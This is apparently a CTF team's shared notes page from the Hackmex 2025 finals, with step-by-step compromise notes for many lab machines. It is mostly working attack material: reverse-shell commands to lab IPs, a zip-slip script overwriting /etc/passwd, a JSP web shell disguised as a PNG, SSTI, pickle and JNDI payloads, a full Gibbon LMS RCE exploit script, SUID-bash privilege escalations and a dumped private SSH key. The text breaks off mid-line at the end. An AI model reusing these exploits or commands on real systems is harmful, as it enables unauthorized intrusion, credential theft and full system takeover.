shuciran naka
    • Create new note
    • Create a note from template
      • Sharing URL Link copied
      • /edit
      • View mode
        • Edit mode
        • View mode
        • Book mode
        • Slide mode
        Edit mode View mode Book mode Slide mode
      • Customize slides
      • Note Permission
      • Read
        • Only me
        • Signed-in users
        • Everyone
        Only me Signed-in users Everyone
      • Write
        • Only me
        • Signed-in users
        • Everyone
        Only me Signed-in users Everyone
      • Engagement control Commenting, Suggest edit, Emoji Reply
    • Invite by email
      Invitee

      This note has no invitees

    • Publish Note

      Share your work with the world Congratulations! 🎉 Your note is out in the world Publish Note

      Your note will be visible on your profile and discoverable by anyone.
      Your note is now live.
      This note is visible on your profile and discoverable online.
      Everyone on the web can find and read all notes of this public team.
      See published notes
      Unpublish note
      Please check the box to agree to the Community Guidelines.
      View profile
    • Commenting
      Permission
      Disabled Forbidden Owners Signed-in users Everyone
    • Enable
    • Permission
      • Forbidden
      • Owners
      • Signed-in users
      • Everyone
    • Suggest edit
      Permission
      Disabled Forbidden Owners Signed-in users Everyone
    • Enable
    • Permission
      • Forbidden
      • Owners
      • Signed-in users
    • Emoji Reply
    • Enable
    • Versions and GitHub Sync
    • Note settings
    • Note Insights New
    • Engagement control
    • Make a copy
    • Transfer ownership
    • Delete this note
    • Save as template
    • Insert from template
    • Import from
      • Dropbox
      • Google Drive
      • Gist
      • Clipboard
    • Export to
      • Dropbox
      • Google Drive
      • Gist
    • Download
      • Markdown
      • HTML
      • Raw HTML
Menu Note settings Note Insights Versions and GitHub Sync Sharing URL Create Help
Create Create new note Create a note from template
Menu
Options
Engagement control Make a copy Transfer ownership Delete this note
Import from
Dropbox Google Drive Gist Clipboard
Export to
Dropbox Google Drive Gist
Download
Markdown HTML Raw HTML
Back
Sharing URL Link copied
/edit
View mode
  • Edit mode
  • View mode
  • Book mode
  • Slide mode
Edit mode View mode Book mode Slide mode
Customize slides
Note Permission
Read
Only me
  • Only me
  • Signed-in users
  • Everyone
Only me Signed-in users Everyone
Write
Only me
  • Only me
  • Signed-in users
  • Everyone
Only me Signed-in users Everyone
Engagement control Commenting, Suggest edit, Emoji Reply
  • Invite by email
    Invitee

    This note has no invitees

    • Publish Note

    Share your work with the world Congratulations! 🎉 Your note is out in the world Publish Note

    Your note will be visible on your profile and discoverable by anyone.
    Your note is now live.
    This note is visible on your profile and discoverable online.
    Everyone on the web can find and read all notes of this public team.
    See published notes
    Unpublish note
    Please check the box to agree to the Community Guidelines.
    View profile
    Engagement control
    Commenting
    Permission
    Disabled Forbidden Owners Signed-in users Everyone
    Enable
    Permission
    • Forbidden
    • Owners
    • Signed-in users
    • Everyone
    Suggest edit
    Permission
    Disabled Forbidden Owners Signed-in users Everyone
    Enable
    Permission
    • Forbidden
    • Owners
    • Signed-in users
    Emoji Reply
    Enable
    Import from Dropbox Google Drive Gist Clipboard
       Owned this note    Owned this note      
    Published Linked with GitHub
    • Any changes
      Be notified of any changes
    • Mention me
      Be notified of mention me
    • Unsubscribe
    - [ ] # Ouroboros Code 😎 Finals Hackmex 2025 ## Kd3na Notas ### bagman "Bagisto /admin /admin@bagman.echocit..... :admin123 stti https://siltonrenato02.medium.com/a-brief-summary-about-a-ssti-to-rce-in-bagisto-e900ac450490 sudo -l import zipfile Tu contenido de /etc/passwd passwd_content = """"""root:$1$kd3n4$5P7sUTeqttfdak/c/wnzx/:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin _apt:x:42:65534::/nonexistent:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin messagebus:x:100:101::/nonexistent:/usr/sbin/nologin sshd:x:101:65534::/run/sshd:/usr/sbin/nologin polkitd:x:997:997:polkit:/nonexistent:/usr/sbin/nologin mysql:x:102:103:MySQL Server,,,:/nonexistent:/bin/false ETSCTF:x:1000:65534:ETSCTF_7ae22738569005ee2b271141c8f40656:/home/ETSCTF:/bin/bash """""" with zipfile.ZipFile(""evil.zip"", ""w"", zipfile.ZIP_DEFLATED) as z: # Traversal path to overwrite /etc/passwd z.writestr(""../../../../etc/passwd"", passwd_content) print(""[+] evil.zip created with traversal to /etc/passwd"") sudo /usr/bin evil.zip ssh root@ip pass: kd3n4" ### hackflix https://www.exploit-db.com/exploits/52079 "; nc -e /bin/bash 10.10.2.30 5555&& echo 'poc'" ### chiseler ME la borraroon Post exploitation: siyuan-v3.1.15-CVE-2024-55658 https://github.com/siyuan-note/siyuan/security/advisories/GHSA-25w9-wqfq-gwqx https://github.com/siyuan-note/siyuan/security/advisories/GHSA-xx68-37v4-4596 https://github.com/siyuan-note/siyuan/security/advisories/GHSA-fqj6-whhx-47p7 https://github.com/siyuan-note/siyuan/security/advisories/GHSA-4pjc-pwgq-q9jp https://github.com/siyuan-note/siyuan/security/advisories/GHSA-8fx8-pffw-w498 node-dot-diver-v1.0.1-CVE-2023-45827 https://github.com/advisories/GHSA-9w5f-mw3p-pj47 https://github.com/clickbar/dot-diver/commit/9790834cf4c2bca75db00e588e58056dacaf602f https://github.com/clickbar/dot-diver/commit/98daf567390d816fd378ec998eefe2e97f293d5a https://nvd.nist.gov/vuln/detail/CVE-2023-45827 ### waveweaver http://10.0.2.0/administrator/# admin:admin POST /administrator/admin_smtp.php?action=set HTTP/1.1 Host: 10.0.3.2 Referer: http://10.0.3.2/administrator/admin_smtp.php Accept-Encoding: gzip, deflate, br Cookie: PHPSESSID=b93h0q49d6qqm2k8d1ceceg4f4 smtpserver=smtp.qq.com&smtpserverport=465&smtpusermail=12345%40qq.com&smtpname=%E6%B5%B7%E6%B4%8B%E5%BD%B1%E8%A7%86%E7%BD%91&smtpuser=12345%40qq.com&smtppass=123456789&smtpreg=off&smtppsw=${eval($_POST[1])} POST /data/admin/smtp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded 1=system('nc+-e+/bin/bash+10.10.3.70+1234'); Priv Esc https://security.snyk.io/vuln/SNYK-JS-JSONPATHPLUS-7945884 Perro priv, este medio quiere y no quiere sudo /opt/node/bin/xpathson '$[?(var _$_root=[].constructor.constructor("console.log(this.process.mainModule.require(\\"child_process\\").execSync(\\"bash -c 'bash -i >& /dev/tcp/10.10.3.70/4444 0>&1'\\").toString())");@root())]' poc.json └─$ nc -lvnp 4444 listening on [any] 4444 ... connect to [10.10.3.70] from (UNKNOWN) [10.0.3.2] 55328 bash: 1\\").toString())");@root())]: ambiguous redirect chmod +s /bin/bash touch /tmp/hola ## jospit007 Notas ### squashpwn Credenciales admin:admin servicio CrushFTP - Puertos 21,22,443,222,8080,9090 URL PoC --> `https://github.com/Stuub/CVE-2024-4040-SSTI-LFI-PoC` Se ejecuta el siguiente comando para obtener la llave ssh del usuario ETSCTF `python3 crushed.py -t https://10.0.1.3 --lfi "/home/ETSCTF/.ssh/id_rsa"` Ya una vez dentro con sudo -l se obtiene el binario que con el siguiente comando se escalan privilegios `sudo /usr/local/bin/ppdl 'https://localhost/?$(chmod +s /bin/bash)'` `bash -p` ### solidor credenciales: **admin:admin** URL de login `http://solidor.echocity-f.com/index.php?m=core&f=index&_su=wuzhicms` Es un RCE - Aquí viene la forma de explotar el CMS `https://github.com/wuzhicms/wuzhicms/issues/188` Con sesión iniciada copia y pega esta URL, en la respuesta vendrá el resultado de la ejecución comando `http://solidor.echocity-f.com/index.php?m=attachment&f=index&v=set&_su=wuzhicms&submit=1&setting=%3C?php%20echo%20exec(%27whoami%27);?%3E` Para la revershell: `http://solidor.echocity-f.com//index.php?m=attachment&f=index&v=set&_su=wuzhicms&submit=1&setting=%3C%3Fphp%20echo%20exec%28%27nc%2010.10.4.22%208090%20-e%20%2Fbin%2Fsh%27%29%3B%20%3F%3E` Una vez dentro con sudo -l User www-data may run the following commands on solidor: (ALL : ALL) NOPASSWD: /opt/node/bin/domit #PIVESC Ponemos el puerto en escucha `nc -lvnp 8090` Se ejecutan los siguientes comandos en la revershell de la victima ``` echo '#!/bin/bash bash -i >& /dev/tcp/10.10.4.22/8090 0>&1' > /tmp/shell.sh chmod +x /tmp/shell.sh ``` Posteriormente el siguiente comando: ``` sudo /opt/node/bin/domit '<div></div>' 'nodeName.constructor.constructor(""global.AdminExec(String.fromCharCode(47,116,109,112,47,115,104,101,108,108,46,115,104))"")()' ``` Lo anterior nos da una shell con root ### mellowtide credenciales **msopen:msopen** login en: `http://10.0.8.2:8080/ms/login.do` Tiene un CMS que puede ser vulnerable a RCE a través de la carga de un archivo --> `https://xz.aliyun.com/news/16067` con el siguiente script se genera un ZIP ya con las condiciones necesarias para subir el archivo en template ```python= #!/usr/bin/env python3 # jsp_png.py - crea shell.jsp con cabecera PNG y empaqueta en mi.zip import os import zipfile png_header = b'\x89PNG\r\n\x1a\n' jsp = """<%@ page import="java.io.InputStream,java.io.BufferedReader,java.io.InputStreamReader" %> <%@ page contentType="text/html; charset=UTF-8" language="java" %> <html> <head><title>shell</title></head> <body> <% // Ejecuta el comando pasado como parametro "cmd" y escribe la salida String cmd = request.getParameter("cmd"); if (cmd != null) { try { Process process = Runtime.getRuntime().exec(cmd); InputStream inputStream = process.getInputStream(); BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(inputStream)); String line; while ((line = bufferedReader.readLine()) != null) { response.getWriter().print(line + "\\n"); } bufferedReader.close(); } catch (Exception e) { response.getWriter().print("ERR: " + e.getMessage()); } } else { response.getWriter().print("no cmd param"); } %> </body> </html> """ # Nombre y estructura dentro del ZIP out_dir = "miruta" # si quieres otra ruta, cámbiala out_name = "shell.jsp" # nombre del jsp dentro del zip zip_name = "mi.zip" # zip resultante # Asegurarse de que la carpeta existe os.makedirs(out_dir, exist_ok=True) # Crear shell.jsp con cabecera PNG + JSP (convertir JSP unicode -> bytes utf-8) path = os.path.join(out_dir, out_name) with open(path, "wb") as f: f.write(png_header + jsp.encode("utf-8")) print(f"Creado {path}") # Crear zip (sin incluir metadatos extra) with zipfile.ZipFile(zip_name, 'w', zipfile.ZIP_DEFLATED) as zf: # Escribir con ruta relativa dentro del zip zf.write(path, arcname=os.path.join(out_dir, out_name)) print(f"Generado {zip_name}") ``` Una vez teniendo el ZIP, se agrega alsuibr un template En la petición de subida se cambia el header GIF89a Ya una vez que se sube se visita la ruta `http://10.0.10.1:8080/template/1/miruta/shell.jsp?cmd=nc%20-e%20/bin/bash%2010.10.2.30%205555` lo anterior te lo da con **root** ### sheetshow ## Lanavarrog Notas ### nacelle ### schedzilla ### keymasher ### plagiarize primer acceso replicar el OS command injection a mano como esta en el blog https://rehmeinfosec.de/labor/cve-2023-45869 pero con este payload 200 "127.0.0.1" /tmp/x.pdf && rm /tmp/x.pdf && nc -e /bin/bash IP PORT) # privesc #se compila import pickle class P: def __reduce__(self): return (__import__('os').system, ('chmod +s /bin/bash',)) f=open("payload_pik","wb").write(pickle.dumps(P())) bajar el archivo payload_pik a la maquina luego consultar el localhost curl -X POST http://127.0.0.1:3000/summarize -H 'Content-Type: application/vnd.bentoml+pickle' --data-binary "@payload_pik" ## MrQuezo Notas ### herbage ```credentials= superadmin:superadmin (useless) ``` ```curl= curl --path-as-is http://10.0.3.4:3000/assets/../../../../../../../../home/ETSCTF/.ssh/id_rsa -o id_rsa ``` Give permissions to id_rsa and use it as root ### vitelized ### stinkum admin:admin ### ollaim ### zoocreeper Inshe maquina laboriosa, se ocupan esta nota y estos pasos https://github.blog/security/vulnerability-research/3-ways-to-get-remote-code-execution-in-kafka-ui/#cve-2023-25194-rce-via-jndiloginmodule Requiere JAVA 8 - https://download.oracle.com/otn/java/jdk/8u181-b13/96a7b8442fe848ef90c96a2fad6ed6d1/jdk-8u181-linux-x64.tar.gz?AuthParam=1759443225_4167c0fead65a8fcab1e9b5314fa39fc git clone https://github.com/artsploit/ysoserial/ cd ysoserial && git checkout scala1 apt-get install mvn -y mvn package -D skipTests=true #make sure you use Java 8 for compilation, it might not compile with recent versions java -cp target/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 1718 CommonsCollections7 "nc -e /bin/bash 10.10.2.30 5555" Burp Payload (No se requiere estar autenticado), solo es relevante el objecto rmi PUT /api/config/validated HTTP/1.1 Host: 10.0.20.3:8080 Accept-Language: en-US,en;q=0.9 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0 Origin: http://10.0.20.3:8080 Accept: */* Content-Type: application/json Connection: keep-alive Content-Length: 384 {"properties":{"kafka":{"clusters":[{"name":"test","bootstrapServers":"10.10.3.70:8000","properties":{"security.protocol":"SASL_PLAINTEXT","sasl.jaas.config":"com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"rmi://10.10.3.70:1718/x\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"x\";","sasl.mechanism":"x"},"readOnly":false}]}}} ## Shanehrd07 Notas ### queueflop Credenciales:admin:admin123, file upload: https://github.com/ctg503/bug_report/blob/main/vendors/oretnom23/dynamic-transaction-queuing-system/RCE-1.md PRIVESC https://security.snyk.io/vuln/SNYK-JS-NPMPROGRAMMATIC-564115 sudo /usr/local/bin/npm-problematic '$(comando)' ### serialies "Acceso a archivo passwd" https://security.snyk.io/vuln/SNYK-JS-MARKDOWNPDF-5411358 **Payload** ```<script> // Path Disclosure document.write(window.location); // Arbitrary Local File Read xhr = new XMLHttpRequest; xhr.onload=function(){document.write((this.responseText))}; xhr.open("GET","file:///home/ETSCTF/.ssh/id_ed25519"); xhr.send(); </script> ``` PrivEsc node inspect 127.0.0.1:1313 exec('require("child_process").execSync("chmod +s /bin/bash")') ### mapipulate Credentials: admin:geoserver Acceso inicial https://www.vicarius.io/vsociety/posts/geoserver-rce-cve-2024-36401 - https://github.com/Warxim/CVE-2022-41852/tree/main Seguir instrucciones para ejecución del exploit ### relucer Credentials: root:root https://cxsecurity.com/issue/WLB-2024040049 privesc echo '#!/bin/bash' > /tmp/pwn.sh echo '/bin/chmod u+s /bin/bash' >> /tmp/pwn.sh echo 'exit 0' >> /tmp/pwn.sh chmod +x /tmp/pwn.sh echo "BASH_ENV=/tmp/pwn.sh" > /tmp/.env_exploit sudo /usr/local/bin/dotenv /tmp/.env_exploit Se debe crear el curso, en el cual se debe poner el contenido del ejemplo de git y permitir que la herramienta se conecte vía SSH al Git Para crear el curso: git clone --branch bs-5 --bare https://github.com/inducer/relate-sample.git ahvega@10.10.0.30:/home/ahvega/ArchivosAPasar/relate-sample.git CVE-2024-32404 ##### Exploit Title: Relate Learning And Teaching system Version before 2024.1 SSTI(Markup Sandbox function) lead to RCE ##### Date: 19/04/2024 ##### Exploit Author: kai6u ##### Vendor Homepage: https://github.com/inducer/ ##### Software Link: https://github.com/inducer/relate ##### Affected Version:before 2024.1 (https://github.com/inducer/relate/commit/2fdbd4480a2d0a45c746639be244a61a0d4112b6) ##### Fixed Version:2024.1 (https://github.com/inducer/relate/commit/d9fa7dcb84b8e5a64ce78ced4f56cdd61c0d59aa) ##### Tested on: Ubuntu 22.04 ##### Summary: SSTI Markup Sandbox function of Relate Learning And Teaching system 3) Next, the attacker modifies the above payload to execute arbitrary commands by changing the subclasses index number to the number of popen. * Payload: * `{{ 'abc'.__class__.__base__.__subclasses__()[210]('whoami',shell=True,stdout=-1).communicate()[0].strip() }}` {{ 'abc'.__class__.__base__.__subclasses__()[224]('cat /etc/passwd',shell=True,stdout=-1).communicate()[0].strip() }} ## Shuciran Notas ### drugstore ### repomaniac ```Credentials admin@repomaniac.echocity-f.com:password https://www.exploit-db.com/exploits/52348 └─$ python 52348.py http://10.0.5.0:3000/ administrator:administrator /home/kali/.ssh/id_rsa /home/kali/.ssh/id_rsa.pub "nc -e /bin/bash 10.10.2.30 5555" --ssh-port 2222 ETSCTF@repomaniac:/opt/gogs$ sudo /opt/node/bin/json-extender '{"__proto__": { "user": "../..", "file": "root/.ssh/id_rsa" }}' -----BEGIN OPENSSH PRIVATE KEY----- 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 RtQtxXRw+1ygcAAAAAAQID -----END OPENSSH PRIVATE KEY----- ``` ### kapi ```Credentials admin:XXadmin1234XX ``` ```python= # Exploit Title: Gibbon LMS has a PHP Deserialization vulnerability on the v26.0.00 version # Date: 22.01.2024 # Exploit Author: SecondX.io Research Team(Ali Maharramli,Fikrat Guliev,Islam Rzayev ) # Vendor Homepage: https://gibbonedu.org/ # Software Link: https://github.com/GibbonEdu/core # Version: v26.0.00 # Tested on: Ubuntu 22.0 # CVE : CVE-2024-24725 import requests import re import sys import base64 import urllib.parse # Proxy configuration - modify these as needed PROXY = { 'http': 'http://127.0.0.1:8080', # Burp Suite proxy 'https': 'http://127.0.0.1:8080' } # Set to False if you don't want to use proxy USE_PROXY = False # Disabled for now to test def login(target_host, target_port, email, password): if "http" in target_host: url = f'{target_host}/login.php?timeout=true' else: url = f'http://{target_host}:{target_port}/login.php?timeout=true' headers = {"Content-Type": "multipart/form-data; boundary=---------------------------174475955731268836341556039466"} data = f"-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"address\"\r\n\r\n\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"method\"\r\n\r\ndefault\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"username\"\r\n\r\n{email}\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"password\"\r\n\r\n{password}\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"gibbonSchoolYearID\"\r\n\r\n025\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"gibboni18nID\"\r\n\r\n0002\r\n-----------------------------174475955731268836341556039466--\r\n" proxies = PROXY if USE_PROXY else None # Create session to handle cookies better session = requests.Session() try: r = session.post(url, headers=headers, data=data, allow_redirects=False, proxies=proxies, verify=False) print(f"[*] Login URL: {url}") print(f"[*] Response status: {r.status_code}") print(f"[*] Response headers: {r.headers}") # Debug: Print all set-cookie headers if 'Set-Cookie' in r.headers: print(f"[*] Set-Cookie header: {r.headers['Set-Cookie']}") # Check if login was successful by looking for redirect to index.php if r.status_code == 302 and 'Location' in r.headers and '/index.php' in r.headers['Location']: print("[+] Login successful! (Redirect to index.php detected)") # Get cookies from session cookies = session.cookies.get_dict() print(f"[*] Session cookies: {cookies}") # Build cookie string cookie_parts = [] for key, value in cookies.items(): cookie_parts.append(f"{key}={value}") cookie_string = "; ".join(cookie_parts) print(f"[+] Final cookie: {cookie_string}") return cookie_string else: print("[-] Login failed - no redirect to index.php") print(f"[-] Location header: {r.headers.get('Location', 'None')}") return None except Exception as e: print(f"[-] Login error: {e}") return None def generate_payload(command): # Given base64-encoded string base64_encoded_string = 'YToyOntpOjclM0JPOjMyOiJNb25vbG9nXEhhbmRsZXJcU3lzbG9nVWRwSGFuZGxlciI6MTp7czo5OiIlMDAqJTAwc29ja2V0IiUzQk86Mjk6Ik1vbm9sb2dcSGFuZGxlclxCdWZmZXJIYW5kbGVyIjo3OntzOjEwOiIlMDAqJTAwaGFuZGxlciIlM0JyOjMlM0JzOjEzOiIlMDAqJTAwYnVmZmVyU2l6ZSIlM0JpOi0xJTNCczo5OiIlMDAqJTAwYnVmZmVyIiUzQmE6MTp7aTowJTNCYToyOntpOjAlM0JzOkNPTU1BTkRfU0laRToiQ09NTUFORCIlM0JzOjU6ImxldmVsIiUzQk4lM0J9fXM6ODoiJTAwKiUwMGxldmVsIiUzQk4lM0JzOjE0OiIlMDAqJTAwaW5pdGlhbGl6ZWQiJTNCYjoxJTNCczoxNDoiJTAwKiUwMGJ1ZmZlckxpbWl0IiUzQmk6LTElM0JzOjEzOiIlMDAqJTAwcHJvY2Vzc29ycyIlM0JhOjI6e2k6MCUzQnM6NzoiY3VycmVudCIlM0JpOjElM0JzOjY6InN5c3RlbSIlM0J9fX1pOjclM0JpOjclM0J9' command_size = len(command) # Decode base64 decoded_bytes = base64.b64decode(base64_encoded_string) decoded_string = decoded_bytes.decode('utf-8') # URL decode payload = urllib.parse.unquote(decoded_string) # Replace placeholders in the decoded string payload = payload.replace('COMMAND_SIZE', str(command_size)) payload = payload.replace('COMMAND', command) print("[+] Payload Generated!") return payload def rce(cookie, target_host, target_port, command): if "http" in target_host: url = f'{target_host}/index.php?q=/modules/System%20Admin/import_run.php&type=externalAssessment&step=4' else: url = f'http://{target_host}:{target_port}/index.php?q=/modules/System%20Admin/import_run.php&type=externalAssessment&step=4' headers = { "Content-Type": "multipart/form-data; boundary=---------------------------104550429928543086952438317710", "Cookie": cookie, "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" } payload = generate_payload(command) data = f'-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="address"\r\n\r\n/modules/System Admin/import_run.php\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="mode"\r\n\r\nsync\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="syncField"\r\n\r\nN\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="syncColumn"\r\n\r\n\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="columnOrder"\r\n\r\n{payload}\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition:form-data; name="columnText"\r\n\r\nN;\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="fieldDelimiter"\r\n\r\n%2C\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="stringEnclosure"\r\n\r\n%22\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="filename"\r\n\r\nDataStructure-externalAssessment.xlsx\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="csvData"\r\n\r\n"External Assessment","Assessment Date","Student","Field Name Category","Field Name","Result"\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="ignoreErrors"\r\n\r\n1\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="Failed"\r\n\r\nSubmit\r\n-----------------------------104550429928543086952438317710--' proxies = PROXY if USE_PROXY else None try: r = requests.post(url, headers=headers, data=data, allow_redirects=False, proxies=proxies, verify=False) print("[+] Request sent!") print(f"[*] Response status: {r.status_code}") # Check for different possible response patterns if "Step 4 - Live Run" in r.text: start_index = r.text.find("<h2>Step 4 - Live Run</h2>") if start_index != -1: end_index = r.text.find("<div class", start_index) if end_index != -1: result = r.text[start_index+26:end_index].strip() if result and len(result) > 0: print("[+] Execution result: \n"+result) else: print("[-] Command executed but no output returned") else: print("[-] Could not find end of output") else: print("[-] Could not find execution results section") else: print("[-] Unexpected response format") # Save response for analysis with open("debug_response.html", "w", encoding='utf-8') as f: f.write(r.text) print("[+] Response saved to debug_response.html for analysis") except Exception as e: print(f"[-] RCE request error: {e}") if __name__ == '__main__': if len(sys.argv) != 6: print("[*] Usage: script.py <target_host> <target_port> <email> <password> <command>") print("[*] Example: python gibbon_rce.py kapi.echocity-f.com 80 admin password \"whoami\"") sys.exit(1) # Disable SSL warnings for cleaner output import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) target_host = sys.argv[1] target_port = sys.argv[2] email = sys.argv[3] password = sys.argv[4] command = sys.argv[5] print(f"[*] Target: {target_host}:{target_port}") print(f"[*] Credentials: {email}:{password}") print(f"[*] Command: {command}") cookie = login(target_host, target_port, email, password) if cookie: print(f"[+] Using cookie: {cookie}") rce(cookie, target_host, target_port, command) else: print("[-] Exploit failed: Could not authenticate") print("[*] Tips:") print(" - Check if credentials are correct") print(" - Verify the target is accessible") print(" - Check if Gibbon School Year ID needs adjustment") ``` ```python= python3 exploit.py kapi.echocity-f.com 80 admin XXadmin1234XX "nc -e /bin/bash 10.10.3.46 1234" ``` **For root** ```bash= cat > /tmp/poc.yml <<'YAML' __proto__: hostname: "localhost" container: name: "localhost" CVE: - "CVE-0000-0000" entrypoint: file: "/root/.ssh/authorized_keys" content: | ssh-rsa 